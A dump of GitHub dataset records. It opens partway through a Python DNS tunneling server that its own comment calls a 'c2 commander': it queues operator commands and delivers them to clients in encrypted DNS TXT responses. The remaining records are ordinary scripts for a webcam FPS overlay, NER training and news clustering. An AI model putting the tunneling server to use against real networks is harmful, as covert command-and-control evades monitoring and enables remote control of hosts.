break\n                else:\n                    if RESPOND_TO_KEEP_ALIVE:\n                        dummy_response = str(random.randint(1,256))\n                        logger.info(f'No command to send to client {client_id}, sending dummy response {dummy_response} to keep-alive')\n                        self.send_data(dummy_response.encode(), KA_COMMAND_ID, client_id, addr,\n                                        rtype='TXT', data_scapy=data_scapy)\n                    else:\n                        logger.info(f'No command to send to client {client_id}')                        \n                    \n            else:\n                command_sent = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('command_sent', None)\n                message_entry = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('response', None)\n                if message_entry:                    \n                    logger.info(f'Received valid response to command {command_sent} from client {client_id} with transaction id {data_scapy.id}')                    \n                    #the response was already written in self.tunnel_messages by message.reassemble_fragment\n                    if message_entry.encode().startswith(REQUEST_NEXT_FROM_SERVER):\n                        event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None)                        \n                        if event_desc:\n                            try:\n                                fragment_acked = int(message_entry.split('-')[1])  # message_entry is a str here, so split on a str separator\n                            except Exception:\n                                logger.exception(f'Invalid REQUEST_NEXT_FROM_SERVER content received from client {client_id} : {message_entry}')\n                                return\n                            logger.info(f'Received request from client {client_id} and command {command_id} to send next fragment, after fragment {fragment_acked} was acked')                            \n                            self.send_next_fragment(client_id, command_id, fragment_acked, 'TXT', addr, data_scapy)\n                        else:\n                            logger.info(f'Received request from client {client_id} and command {command_id} to send next fragment, but no pending fragment')                            \n                        return\n                else:\n                    logger.info(f'Received valid response but no matching client {client_id} and command {command_id}. 
Ignoring...') \n except Exception:\n logger.exception('datagram_received')\n try:\n logger.error(f'invalid datagram_received from {self.peername} : {data}')\n except Exception:\n pass\n\n def send_data(self, data, command_id, client_id, addr, rtype='TXT', data_scapy=None, without_encryption=False):\n logger.info(f'Sending data of length {len(data)}')\n if command_id in COMMANDS_WITHOUT_ENCRYPTION:\n without_encryption = True\n if len(data) > self.max_data_length:\n logger.info(f'Truncating data of length {len(data)} to {self.max_data_length}')\n data = data[:self.max_data_length]\n fragments = self.message_builder.fragmenter(data, rtype, client_id, command_id, is_dns_response=True,\n without_encryption=without_encryption)\n self.loop.create_task(self.send_fragments(command_id, client_id, fragments, rtype, addr, data_scapy))\n \n async def send_fragments(self, command_id, client_id, fragments, rtype, addr, data_scapy=None):\n logger.info(f'Starting send_fragments task for transaction id {data_scapy.id}')\n number_of_fragments = len(fragments)\n logger.info(f'Sending fragment 1 out of {number_of_fragments}')\n if number_of_fragments > 1:\n #prepare mechanism for sending of multiple fragments\n if client_id not in self.pending_fragments_to_send_events:\n self.pending_fragments_to_send_events[client_id] = {}\n self.pending_fragments_to_send_events[client_id][command_id] = {'list':deepcopy(fragments), 'number_of_fragments':number_of_fragments}\n self.send_message(fragments[0], rtype, addr, data_scapy)\n\n def send_next_fragment(self, client_id, command_id, fragment_acked, rtype, addr, data_scapy):\n #next fragments will be sent on the next udp sockets querying them\n pointer = self.pending_fragments_to_send_events[client_id][command_id]\n pointer_list = pointer['list']\n if not all([(el is True) for el in pointer_list]):\n pointer_list[fragment_acked-1] = True #True means this fragment was successfully acked by client\n for index in range(len(pointer_list)):\n fragment = pointer_list[index]\n if fragment is not True:\n logger.info(f'Sending fragment {index+1} out of {pointer[\"number_of_fragments\"]}')\n self.send_message(fragment, rtype, addr, data_scapy)\n break\n if all([(el is True) for el in pointer_list]):\n self.pending_fragments_to_send_events[client_id].pop(command_id)\n if not self.pending_fragments_to_send_events[client_id]:\n self.pending_fragments_to_send_events.pop(client_id)\n \n def send_message(self, dns_data, rtype, addr, data_scapy=None):\n logger.info(f'Starting send_message task for transaction id {data_scapy.id} to addr {addr}')\n logger.debug(f'Reusing query qd {data_scapy.show(dump=True)}')\n message = raw(DNS(qr=1, id=data_scapy.id, aa=1, rd=0, qd=data_scapy.qd, an=DNSRR(rdata=dns_data, ttl=0,\n rrname=data_scapy.qd.qname, type=rtype)))\n logger.info(f'Sending message {message}, with data {dns_data}, and type {rtype}')\n self.transport.sendto(message, addr)\n\n def error_received(self, exc):\n logger.warning(f'error_received : {exc}')\n\n def connection_lost(self, exc):\n logger.info(f'connection_lost from : {self.peername}, {exc}')\n super().connection_lost(exc)\n\n\nclass DnstServer:\n\n def __init__(self):\n global logger\n logger = get_logger(logger_name='pydnst_server')\n\n if not os.path.exists(PATH_CONFIG):\n logger.info(f'No config file at {PATH_CONFIG}, leaving ...')\n sys.exit(1) \n with open(PATH_CONFIG,'r') as fd:\n config_toml = toml.load(fd)\n config_server = config_toml['server']\n self.LISTENING_INTERFACE = config_server['LISTENING_INTERFACE']\n 
self.LISTENING_PORT = config_server['LISTENING_PORT']\n self.SERVER_PRIVATE_PEM_PATH = config_server['SERVER_PRIVATE_PEM_PATH']\n self.MESSAGES_JSON = config_server['MESSAGES_JSON']\n self.UDS_PATH_COMMANDER = config_server['UDS_PATH_COMMANDER']\n\n self.DNST_SERVER_NAME = DNST_SERVER_NAME = config_toml['general']['DNST_SERVER_NAME'].encode()\n self.FILTERED_QUERY_NAMES = (DNST_SERVER_NAME, b'ns1.'+DNST_SERVER_NAME, b'ns2.'+DNST_SERVER_NAME,\n b'www.'+DNST_SERVER_NAME, b'www.ns1.'+DNST_SERVER_NAME, b'www.ns2.'+DNST_SERVER_NAME, \n b'_dmarc.'+DNST_SERVER_NAME)\n self.DEFAULT_SHARED_KEY = config_toml['general']['DEFAULT_SHARED_KEY'].encode()\n \n try:\n self.LISTENING_ADDRESS = check_output(f\"ip --brief addr show {self.LISTENING_INTERFACE} | awk -F ' ' '{{ print $3 }}' | cut -d '/' -f 1\", shell=True).strip().decode()\n except Exception:\n logger.exception('Cannot obtain eth0 ip address to listen on')\n print('Cannot obtain eth0 ip address to listen on')\n raise\n self.uds_path_commander = self.UDS_PATH_COMMANDER\n self.tunnel_messages = {}\n self.tunnel_mng_messages = {RSA_COMMAND_ID:{}, ACK_COMMAND_ID:{}}\n self.pending_fragments_to_send_events = {}\n \n try:\n with open(self.MESSAGES_JSON, 'w') as fd:\n json.dump({}, fd)\n except Exception:\n logger.exception('init')\n \n self.server_private_key = None\n self.shared_keys = {} \n if os.path.exists(self.SERVER_PRIVATE_PEM_PATH):\n logger.info('Using a server private pem') \n try:\n with open(self.SERVER_PRIVATE_PEM_PATH, 'rb') as key_file:\n self.server_private_key = crypto_serialization.load_pem_private_key(\n key_file.read(),\n password=None,\n backend=crypto_default_backend()\n )\n except Exception:\n logger.exception('server_private_key')\n\n def store_ordered_tunnel_messages(self, tunnel_messages):\n #replace command_id 0 by 'keep-alive' in json_display (stored json self.MESSAGES_JSON)\n json_display = {}\n for key,value in tunnel_messages.items():\n new_value = {}\n for key1,value1 in value.items():\n new_value[key1 if key1 != '0' else 'keep-alive'] = value1\n json_display[key] = new_value\n \n #order display by date (per client)\n res = OrderedDict({kk:json_display[kk] for kk in sorted(json_display,\n key=lambda ke: json_display[ke][list(json_display[ke].keys())[0]]['date'], reverse=True)})\n \n new_res = OrderedDict()\n for key,vdict in res.items():\n new_res[key] = OrderedDict({kk:vdict[kk] for kk in sorted(vdict, key=lambda ke: vdict[ke]['date'], reverse=True)})\n \n with open(self.MESSAGES_JSON, 'w') as fd:\n json.dump(new_res, fd, indent=4) \n\n def generate_command_id(self):\n return str(random.randint(MIN_COMMAND_ID,256))\n \n async def commander_cb(self, reader, writer):\n #header of 2 bytes telling the length to read\n try:\n logger.info('commander_cb was called')\n next_length_bytes = await reader.readexactly(MSG_2_STRUCT.size)\n next_length = MSG_2_STRUCT.unpack(next_length_bytes)[0]\n command_to_send = await asyncio.wait_for(reader.readexactly(next_length), timeout=5)\n command_json = json.loads(command_to_send.decode())\n client_id = command_json['client_id']\n command = command_json['command']\n now = datetime.fromtimestamp(time.time()).strftime(r'%Y-%m-%d--%H:%M:%S')\n command_id = self.generate_command_id()\n if client_id not in self.tunnel_messages:\n logger.warning(f'Client {client_id} not found in tunnel_messages {self.tunnel_messages}. 
Ignoring ...')\n                return\n            self.tunnel_messages[client_id][command_id] = {'command_awaiting_ka':command, 'date':now}\n            self.store_ordered_tunnel_messages(self.tunnel_messages)\n            writer.write(b'ok')\n            try:\n                await asyncio.wait_for(writer.drain(), timeout=5)\n            except Exception:\n                logger.exception('commander_cb writer drain')\n            logger.info(f'Command {command} was successfully added to tunnel_messages for client {client_id}')\n        except asyncio.CancelledError:\n            raise            \n        except Exception:\n            logger.exception('commander_cb')\n        finally:\n            writer.close()\n            if PYTHON_GREATER_37:\n                try:\n                    await writer.wait_closed()  #python 3.7                                              \n                except Exception as exc:\n                    logger.warning('commander_cb writer.wait_closed : '+str(exc))                    \n        \n    async def run_command_listener(self):\n        logger.info('Starting command listener')\n        self.commander_server = await asyncio.start_unix_server(self.commander_cb, path=self.uds_path_commander)\n        #for convenience we want non root to be able to use the c2 commander        \n        os.chmod(self.uds_path_commander, stat.S_IRWXU | stat.S_IRWXG | stat.S_IROTH | stat.S_IWOTH)\n        \n    def run(self):\n        try:\n            self.loop = asyncio.get_event_loop()\n            logger.info(f'DnstServer listening on {self.LISTENING_ADDRESS}:{self.LISTENING_PORT}')\n            dnst_server_task = self.loop.create_datagram_endpoint(lambda :DnstServerProtocol(\n                                self.tunnel_messages, self.tunnel_mng_messages,\n                                self.store_ordered_tunnel_messages, self.pending_fragments_to_send_events,\n                                self.server_private_key, self.shared_keys, self.DNST_SERVER_NAME,\n                                self.FILTERED_QUERY_NAMES, self.DEFAULT_SHARED_KEY),\n                                local_addr=(self.LISTENING_ADDRESS, self.LISTENING_PORT))\n            transport, protocol = self.loop.run_until_complete(dnst_server_task)\n            self.loop.run_until_complete(self.run_command_listener())\n            self.loop.run_forever()\n        except Exception:\n            logger.exception('run')            \n        except:\n            logger.info('DnstServer stopped')            \n        finally:\n            try:\n                shutil.copy(self.MESSAGES_JSON, self.MESSAGES_JSON+'.bk')\n                os.remove(self.MESSAGES_JSON)\n                transport.close()\n            except Exception:\n                pass\n\n    \n","repo_name":"mori-b/pydnst","sub_path":"pydnst/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":27310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8218489324","text":"import cv2\nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\npre_time = 0\ncurrent_time = 0\nwhile True:\n    success, frame = cap.read()\n\n    current_time = time.time()\n    fps = 1/ (current_time-pre_time)\n    pre_time = current_time\n\n    font = cv2.FONT_HERSHEY_SCRIPT_COMPLEX\n\n    # FPS Box\n    start_point = (0, 0)\n    end_point = (102, 32)\n    color = (255, 255, 255)\n    thickness = -1\n\n    FPS_Box = cv2.rectangle(frame, start_point, end_point, color, thickness) \n\n    cv2.putText(\n        FPS_Box,\n        str(int(fps)),\n        (31, 26),\n        font, 1,\n        (255, 200, 0),\n        2\n    )\n\n    cv2.imshow(\"Camera\", frame)\n\n    if cv2.waitKey(10) == ord('0'):\n        break\n    \ncap.release()\ncv2.destroyAllWindows() ","repo_name":"ArNAB-0053/Face-detection-using-openCV-and-mediapipe","sub_path":"template_for_all.py","file_name":"template_for_all.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26921357292","text":"import argparse\nimport json\nimport os\nfrom typing import List\nfrom torch.optim.adam import Adam\nfrom torch.optim.sgd import SGD\n\nfrom flair.data_fetcher import NLPTaskDataFetcher, NLPTask\nfrom flair.data import TaggedCorpus\nfrom flair.embeddings import 
WordEmbeddings, StackedEmbeddings, PooledFlairEmbeddings, CharacterEmbeddings, \\\n    BertEmbeddings\nfrom flair.training_utils import EvaluationMetric\nfrom flair.visual.training_curves import Plotter\nfrom flair.trainers import ModelTrainer\nfrom flair.models import SequenceTagger\n\n\ndef train(params):\n    # 1. get the corpus\n    print(NLPTask[params[\"task\"]])\n    corpus = NLPTaskDataFetcher.load_corpus(task=NLPTask[params[\"task\"]], files=params['filenames'])\n    print(corpus)\n\n    # 2. what tag do we want to predict?\n    tag_type = 'ner'\n\n    # 3. make the tag dictionary from the corpus\n    tag_dictionary = corpus.make_tag_dictionary(tag_type=tag_type)\n    print(tag_dictionary.idx2item)\n\n    embedding_types = []\n\n    if params[\"word_embeddings\"] is True:\n        embedding_types.append(WordEmbeddings(params[\"embeddings_name\"]))\n\n    if params[\"bert_embeddings\"] is True:\n        embedding_types.append(BertEmbeddings(params[\"bert_model\"]))\n\n    if params[\"char_embeddings\"] is True:\n        # comment in this line to use character embeddings\n        embedding_types.append(CharacterEmbeddings())\n\n    if params[\"charlm_embeddings\"] is True:\n        embedding_types.append(PooledFlairEmbeddings('news-forward', pooling='min'))\n        embedding_types.append(PooledFlairEmbeddings('news-backward', pooling='min'))\n\n    embeddings = StackedEmbeddings(embeddings=embedding_types)\n\n    # initialize sequence tagger\n\n    tagger = SequenceTagger(hidden_size=params[\"hidden_size\"],\n                            embeddings=embeddings,\n                            tag_dictionary=tag_dictionary,\n                            tag_type=tag_type,\n                            use_rnn=params[\"use_rnn\"],\n                            rnn_layers=params[\"rnn_layers\"],\n                            use_crf=params[\"use_crf\"]\n                            )\n\n    base_path = os.path.join(params[\"model_dir\"], params[\"model_tag\"])\n    os.makedirs(base_path, exist_ok=True)\n\n    with open(os.path.join(base_path, 'config.json'), \"w\") as cfg:\n        json.dump(params, cfg)\n    # initialize trainer\n\n    optim = SGD  # default, so optim is always defined even when the config has no \"optimizer\" key\n    if \"optimizer\" in params:\n        if params[\"optimizer\"] == \"adam\":\n            optim = Adam\n        elif params[\"optimizer\"] == \"sgd\":\n            optim = SGD\n    trainer: ModelTrainer = ModelTrainer(tagger, corpus, optimizer=optim)\n\n    trainer.train(base_path, EvaluationMetric.MICRO_F1_SCORE, mini_batch_size=params[\"mini_batch_size\"],\n                  max_epochs=params[\"max_epochs\"], save_final_model=params[\"save_model\"],\n                  train_with_dev=params[\"train_with_dev\"], anneal_factor=params[\"anneal_factor\"],\n                  embeddings_in_memory=params[\"inmem\"], test_mode=False)\n\n    plotter = Plotter()\n    plotter.plot_training_curves(os.path.join(base_path, \"loss.tsv\"))\n    plotter.plot_weights(os.path.join(base_path, 'weights.txt'))\n\n\nif __name__ == \"__main__\":\n    arg_parser = argparse.ArgumentParser()\n    arg_parser.add_argument(\"--config\", default=\"config.json\")\n\n    args = arg_parser.parse_args()\n\n    with open(args.config) as cfg:\n        params = json.load(cfg)\n\n    print(params)\n    train(params)\n","repo_name":"Nelsonvon/flair","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8526246803","text":"import io\nimport os\nimport sys\nimport codecs\nimport re\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom sklearn.cluster import KMeans\n#import heapq\nimport operator\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import pairwise_distances_argmin_min\n\nfrom 
dataCollector.Silhouette_Coefficient import S_C\nimport dataCollector.Remove_outlier\nimport django\nimport logging\n\nlogger = logging.getLogger('dataCollector')\n\ndef f_get_sorted_index_array(terms_weight_sum_array, select_num):\n    return np.argsort(terms_weight_sum_array)[::-1][:select_num]\n\ndef drop_useless_words(charact_words_dictionary):\n    useless_words_list = [\"said\", \"wa\", \"ha\", \"mr\", \"fa\", \"cnn\", \"bbc\"]\n    for useless_word in useless_words_list:\n        if useless_word in charact_words_dictionary.keys():\n            del charact_words_dictionary[useless_word]\n    return charact_words_dictionary\n\n\n#******************************************************************************************\n# Function description: Main body of K-means clustering.                                  *\n#******************************************************************************************\ndef f_k_meanCluster(data_ndarray, K):\n    # cluster the samples into K groups\n    R_O = dataCollector.Remove_outlier.R_outlier()\n    model = KMeans(K)\n    model.fit(data_ndarray)\n    clustering = model.labels_\n    centroids = model.cluster_centers_\n    final_centroids = R_O.Remove_cluster_one(clustering, K, centroids, data_ndarray.shape[0])\n    #closest_points_index_list, value = pairwise_distances_argmin_min(centroids, data_ndarray)\n    closest_points_index_list, value = pairwise_distances_argmin_min(final_centroids, data_ndarray)\n    #logger.debug(str(closest_points_index_list))\n\n    return clustering, centroids, closest_points_index_list\n\n\n#******************************************************************************************\n# Function description: Get top N important characteristics for each cluster.             *\n#    Input: K_num, news_clustering, news_centroids.                                       *\n#    Return: clusters_charact_2dlist: (list of dictionaries).                             *\n#            [{('charac_words', weight), ('charac_words', weight), ...},                  *\n#             {...}, ...,                                                                 *\n#             {('charac_words', weight), ('charac_words', weight), ...}]                  *\n#            Dimension: (N * 20).                                                         *\n#******************************************************************************************\ndef summarize_clusters_characs_2dlist(K_num, news_terms, news_clustering, news_centroids, charac_selec_num):\n    clusters_charact_2dlist = []\n    for cluster_centroid in news_centroids:\n        cluster_charact_index_list = list( f_get_sorted_index_array(np.array(cluster_centroid), charac_selec_num) )\n        clusters_charact_temp_dic = {}\n        for cluster_charact_index in cluster_charact_index_list:\n            clusters_charact_temp_dic[news_terms[cluster_charact_index]] = cluster_centroid[cluster_charact_index]\n        clusters_charact_temp_dic = drop_useless_words(clusters_charact_temp_dic)\n        clusters_charact_2dlist.append(clusters_charact_temp_dic)\n    return clusters_charact_2dlist\n\n\n#******************************************************************************************\n# Function description: Get N characteristics for overall dataset,                        *\n#                       from clusters' characteristics' matrix.                           *\n#    Input: K_num, news_clustering, news_centroids,                                       *\n#           clusters_charact_2dlist.                                                      *\n#    Return: overall_charact_words_dic: (dictionary)                                      *\n#            {('charac_words', weight),                                                   *\n#              ... 
,                                                                       *\n#             ('charac_words', weight) }                                                  *\n#******************************************************************************************\n\ndef summarize_clusters_characs_clustering(K_num, news_clustering, news_centroids, clusters_charact_2dlist, charac_selec_num):\n    # Method-2: Use new important dimensions according to each cluster.\n    overall_charact_words_dic = {}\n    while (len(overall_charact_words_dic) < charac_selec_num):\n        cluster_index = 0\n        for cluster_centroid in news_centroids:\n            cluster_centroid_charac_dic = clusters_charact_2dlist[cluster_index]\n            select_charac_key = max(cluster_centroid_charac_dic.items(), key=operator.itemgetter(1))[0]\n            if select_charac_key not in list(overall_charact_words_dic.keys()):\n                overall_charact_words_dic[select_charac_key] = cluster_centroid_charac_dic[select_charac_key]\n            del (clusters_charact_2dlist[cluster_index])[select_charac_key]\n            cluster_index += 1\n    #logger.debug(str(len(overall_charact_words_dic)))\n    #logger.debug(str(overall_charact_words_dic))\n    return overall_charact_words_dic # {('charac_words', weight), ()}\n\n\n# ******************************************************************************************\n# Function description: draw data in 16 dimensions with clustering.                        *\n#    Input: news_clustering,                                                               *\n#           news_centroids.                                                                *\n#           overall_charact_words_dic: (dictionary)                                        *\n#           {('charac_words', weight),                                                     *\n#             ... ,                                                                        *\n#            ('charac_words', weight) }                                                    *\n# ******************************************************************************************\ndef f_cluster_plot(news_terms_ndarray, K_num, closest_points_index_list):\n    pca = PCA(n_components=2).fit(news_terms_ndarray)\n    pca_result2D = pca.transform(news_terms_ndarray)\n\n    pca_nearest_points_array = pca_result2D[closest_points_index_list,:]\n    #logger.debug((pca_nearest_points_array.shape))\n\n    # After lowering the dimension, I used KMeans to cluster it\n    model = KMeans(K_num)\n    model.fit(pca_result2D)\n\n    #PCA_km.fit(TFIDF_M)\n    clustering = model.labels_\n    centroids = model.cluster_centers_\n\n    closest_points_index_list_pca, _ = pairwise_distances_argmin_min(centroids, pca_result2D)\n    pca_nearest_points_array_2d = pca_result2D[closest_points_index_list_pca, :]\n    #logger.debug(str(closest_points_index_list_pca))\n\n    plt.scatter(pca_result2D[:, 0], pca_result2D[:, 1], c=clustering, s=30, cmap='rainbow')\n    plt.scatter(centroids[:,0], centroids[:,1], marker='x', s=50, linewidths=3, color='orange', zorder=10)\n    plt.scatter(pca_nearest_points_array[:, 0], pca_nearest_points_array[:, 1], marker='x', s=40, linewidths=2, color='blue', zorder=10)\n    plt.scatter(pca_nearest_points_array_2d[:, 0], pca_nearest_points_array_2d[:, 1], marker='x', s=40, linewidths=2, color='red', zorder=10)\n    plt.show()\n\n    return closest_points_index_list_pca\n\n#******************************************************************************************\n# Function description: Show different clusters' centroids' characteristics:              *\n#    Input: news_clustering,                                                              *\n#           news_centroids.                                                               *\n#           overall_charact_words_dic: (dictionary)                                       *\n#           {('charac_words', weight),                                                    *\n#             ... 
,                                                                       *\n#            ('charac_words', weight) }                                                   *\n#******************************************************************************************\n'''\ndef show_clusters_characs(news_terms, news_clustering, news_centroids, overall_charact_words_dic):\n    print(\"Now print all characteristics' weight in different centroids:\")\n    cluster_index = 0\n    for cluster_centroid in news_centroids:\n        print(\"\\tClut_%d\\t\" % cluster_index, end='', flush=True)\n        cluster_index += 1\n    print(\"\\n\", end='', flush=True)\n\n    for charact_words_key in overall_charact_words_dic.keys():\n        print(charact_words_key + '\\t: ', end='', flush=True)\n        for cluster_centroid in news_centroids:\n            print('%.4f\\t' % cluster_centroid[ news_terms.index(charact_words_key)], end='', flush=True)\n        print(\"\\n\", end='', flush=True)\n'''\n\n#******************************************************************************************\n# Function description: Final summarization of each cluster's top characteristics.        *\n#    Input: news_clustering,                                                              *\n#           news_centroids.                                                               *\n#           clusters_charact_2dlist: (list of dictionaries).                              *\n#           [{('charac_words', weight), ('charac_words', weight), ...},                   *\n#            {...}, ...,                                                                  *\n#            {('charac_words', weight), ('charac_words', weight), ...}]                   *\n#           Dimension: (N * 20).                                                          *\n#******************************************************************************************\n\ndef summarize_clusters_characs(news_clustering, news_centroids, clusters_charact_2dlist, charac_final_num):\n    logger.debug(\"\\n\\tFinal summarization of each cluster's characteristics:\")\n    cluster_index = 0\n    for cluster_centroid in news_centroids:\n        cluster_charac_words_dic = clusters_charact_2dlist[cluster_index]\n        logger.debug(\"\\tClut_\" + str(cluster_index) + \":\")\n        # Select top N characteristics according to dic's values.\n        top_characs = sorted(cluster_charac_words_dic, key=cluster_charac_words_dic.__getitem__, reverse=True)[0:charac_final_num]\n        logger.debug(str(top_characs))\n        cluster_index += 1\n\n\n# ******************************************************************************************\n# Function description: Main body of the test driver for the K-means algorithm.            
*\n# ******************************************************************************************\ndef f_k_means_test(news_terms_ndarray, news_terms, K_num):\n    charac_selec_num = min(100, len(news_terms)) # All items are selected\n    charac_final_num = 20\n\n    news_clustering, news_centroids, closest_points_index_list = f_k_meanCluster(news_terms_ndarray, K_num)\n\n    # Get 2-D data where each row is a cluster's top characs' dic.\n    clusters_charact_2dlist = summarize_clusters_characs_2dlist(K_num, news_terms, news_clustering, news_centroids, charac_selec_num)\n\n    # Get a dic of common top characs for all clusters.\n    #overall_charact_words_dic = summarize_clusters_characs_clustering(K_num, news_clustering, news_centroids, clusters_charact_2dlist, charac_selec_num)\n    # Now draw all data in common-top-characs' dimensions.\n    #show_clusters_characs(news_terms, news_clustering, news_centroids, overall_charact_words_dic)\n\n    #summarize_clusters_characs(news_clustering, news_centroids, clusters_charact_2dlist, charac_final_num)\n    closest_points_index_list_pca = None\n    #closest_points_index_list_pca = f_cluster_plot(news_terms_ndarray, K_num, closest_points_index_list)\n\n    return closest_points_index_list, closest_points_index_list_pca\n\n\nclass Com_similarity:\n    # Tokenizer function\n    def lemma_tokenizer_v2(ori_news_list):\n        # use the standard scikit-learn tokenizer first\n        standard_tokenizer = CountVectorizer().build_tokenizer()\n        tokens = standard_tokenizer(ori_news_list)\n        # then use NLTK to perform lemmatisation on each token\n        lemmatizer = nltk.stem.WordNetLemmatizer()\n        lemma_tokens = []\n        for token in tokens:\n            if re.search('[a-zA-Z]', token):\n                lemma_token = lemmatizer.lemmatize(token)\n                if len(lemma_token) > 2:\n                    lemma_tokens.append(lemma_token)\n        return lemma_tokens\n\n    # Static K-Means: find one representative news item in each cluster\n    def relevent_detection(self, news_obj_list):\n        try:\n            news_documents = []\n\n            for news_obj in news_obj_list:\n                if news_obj.news_summarize is not None:\n                    #logger.debug(\"\\t\\t#news_sum_len: %d\" % len(news_obj.news_summarize))\n                    news_documents.append(news_obj.news_summarize.lower())\n            #logger.debug(\"\\t# Totally %d news file.\" % len(news_documents))\n\n            tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000, min_df=0.1, stop_words='english', \\\n                                               use_idf=True, tokenizer=Com_similarity.lemma_tokenizer_v2, ngram_range=(1, 1))\n            tfidf_matrix = tfidf_vectorizer.fit_transform(news_documents)  # fit the vectorizer to synopses\n            #logger.debug(\"\\t\\tThe matrix's shape: \" + str(tfidf_matrix.shape))\n\n            news_terms = tfidf_vectorizer.get_feature_names()\n            #logger.debug(\"\\t\\tVocabulary has \" + str(len(news_terms)) + \" distinct terms\")\n            #logger.debug(\"\\t\\tterms:\" + str(news_terms) )\n\n            '''\n            # Get a flat 1-D numpy.array of different terms' weights' summarization from sparse matrix.\n            terms_weight_sum_array = (tfidf_matrix.sum(axis=0).getA())[0]\n            #logger.debug(str(terms_weight_sum_array))\n            \n            # Get terms' words according to their indexes.\n            target_words_num = 20\n            sorted_index_array = f_get_sorted_index_array(terms_weight_sum_array, target_words_num)\n            #logger.debug(str(sorted_index_array))\n            \n            charact_words_dictionary = {}\n            logger.debug(\"\\tThe top 50 most characteristic terms are:\")\n            logger.debug(\"\\tTerms\\tIndex\\tWeight\")\n            for sorted_index in sorted_index_array:\n                charact_words_dictionary[news_terms[sorted_index]] = sorted_index\n                logger.debug(\"\\t\" + str(news_terms[sorted_index]) \\\n                             + \"\\t:\" + str(sorted_index) \\\n                             + 
\"\\t,%.4f\" % terms_weight_sum_array[sorted_index])\n            #drop_useless_words(charact_words_dictionary)\n            '''\n\n            # Note: the 's' parameter controls the size of the points\n            news_terms_ndarray = tfidf_matrix.toarray()\n            logger.info(\"\\t\\tnews_terms_ndarray's shape is: \" + str(news_terms_ndarray.shape))\n\n            # Clustering for 1 group.\n            K_num = 2\n            closest_points_index_list, closest_points_index_list_pca = f_k_means_test(news_terms_ndarray, news_terms, K_num)\n\n            logger.debug(\"\\tclosest_points_index_list:\" + str(closest_points_index_list))\n            idx = 0\n            for closest_points_index in closest_points_index_list:\n                idx = idx + 1\n                logger.info(\"Centroid -\" + str(idx) + \"- nearest News-\" + str(news_obj_list[closest_points_index].id) + \"-: \" + str(news_obj_list[closest_points_index].news_title))\n\n            '''\n            logger.debug(\"\\tclosest_points_index_list_pca:\" + str(closest_points_index_list_pca))\n            idx = 0\n            for closest_points_index in closest_points_index_list_pca:\n                idx = idx + 1\n                logger.info(\"Centroid -\" + str(idx) + \"- nearest News-\" + str(news_obj_list[closest_points_index].id) + \"-: \" + str(news_obj_list[closest_points_index].news_title))\n            '''\n            return closest_points_index_list\n        except Exception as e:\n            logger.error(e)\n            return None\n\n    # Dynamic K-Means: find one representative news item in each cluster\n    def dynamic_relevent_detection(self, news_obj_list):\n        try:\n            news_documents = []\n\n            for news_obj in news_obj_list:\n                if news_obj.news_summarize is not None:\n                    # logger.debug(\"\\t\\t#news_sum_len: %d\" % len(news_obj.news_summarize))\n                    news_documents.append(news_obj.news_summarize.lower())\n\n            tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000, min_df=0.1, stop_words='english', \\\n                                               use_idf=True, tokenizer=Com_similarity.lemma_tokenizer_v2,\n                                               ngram_range=(1, 1))\n            tfidf_matrix = tfidf_vectorizer.fit_transform(news_documents)  # fit the vectorizer to synopses\n            news_terms = tfidf_vectorizer.get_feature_names()\n\n            # Note: the 's' parameter controls the size of the points\n            news_terms_ndarray = tfidf_matrix.toarray()\n            logger.info(\"\\t\\tnews_terms_ndarray's shape is: \" + str(news_terms_ndarray.shape))\n\n            # Get suitable clusters' number.\n            silh_coef_obj = S_C()\n            #k_num_silh_coef_dict = silh_coef_obj.compute_K(news_terms_ndarray)\n            k_num_silh_coef_dict = silh_coef_obj.compute_K_elbow(news_terms_ndarray)\n            #k_num_silh_coef_dict = silh_coef_obj.elbow_mean_distortion(news_terms_ndarray)\n            #K_num = silh_coef_obj.Choose_cluster_number(k_num_silh_coef_dict)\n            K_num = silh_coef_obj.silh_coef_and_cluster_num_linear_regression(k_num_silh_coef_dict)\n            logger.debug(\"K_num:-[\" + str(K_num) + \"]-\")\n\n            # Clustering for 1 group.\n            #K_num = 2\n            closest_points_index_list, closest_points_index_list_pca = f_k_means_test(news_terms_ndarray,\n                                                                                      news_terms, K_num)\n\n            logger.debug(\"\\tclosest_points_index_list:\" + str(closest_points_index_list))\n            idx = 0\n            for closest_points_index in closest_points_index_list:\n                idx = idx + 1\n                logger.info(\"Centroid -\" + str(idx) + \"- nearest News-\" + str(\n                    news_obj_list[closest_points_index].id) + \"-: \" + str(\n                    news_obj_list[closest_points_index].news_title))\n\n            return closest_points_index_list\n        except Exception as e:\n            logger.error(e)\n            return None","repo_name":"WenruiShen/GrapeNews","sub_path":"gungnir/dataCollector/Com_similarity.py","file_name":"Com_similarity.py","file_ext":"py","file_size_in_byte":18844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
